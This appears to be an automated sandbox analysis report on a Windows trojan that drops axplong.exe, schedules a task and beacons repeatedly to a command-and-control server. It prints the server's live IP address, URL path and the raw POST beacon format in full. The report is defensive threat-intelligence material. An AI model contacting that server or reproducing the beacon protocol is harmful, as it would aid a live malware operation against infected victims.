Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BEBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 9_2_00BEBD60
Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: axplong.exe, 00000009.00000002.3364157249.000000000122B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
Source: axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3;
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php9
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpB
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpC
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpP
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpR
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcoded
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
Source: axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi/;
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedq
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpt
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpv

System Summary
barindex
PE file contains section with special chars
Source: 9ICG2PuZbG.exe Static PE information: section name:
Source: 9ICG2PuZbG.exe Static PE information: section name: .idata
Source: 9ICG2PuZbG.exe Static PE information: section name:
Source: axplong.exe.1.dr Static PE information: section name:
Source: axplong.exe.1.dr Static PE information: section name: .idata
Source: axplong.exe.1.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BE4CF0 9_2_00BE4CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C23068 9_2_00C23068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BEE440 9_2_00BEE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C17D83 9_2_00C17D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C38D70 9_2_00C38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C38D70 9_2_00C38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C38D70 9_2_00C38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C38D70 9_2_00C38D70
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BE4AF0 9_2_00BE4AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C2765B 9_2_00C2765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C22BD0 9_2_00C22BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C2777B 9_2_00C2777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C26F09 9_2_00C26F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00C28720 9_2_00C28720
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe 1DBBF81D6F4B2222B37594E8FF30672BF85FD360F347CBD20B1A5D7B841DD276
Uses 32bit PE files
Source: 9ICG2PuZbG.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9ICG2PuZbG.exe Static PE information: Section: ZLIB complexity 0.9967749489100818
Source: 9ICG2PuZbG.exe Static PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
Source: axplong.exe.1.dr Static PE information: Section: ZLIB complexity 0.9967749489100818
Source: axplong.exe.1.dr Static PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 9ICG2PuZbG.exe Virustotal: Detection: 52%
Source: 9ICG2PuZbG.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File read: C:\Users\user\Desktop\9ICG2PuZbG.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\9ICG2PuZbG.exe "C:\Users\user\Desktop\9ICG2PuZbG.exe"
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
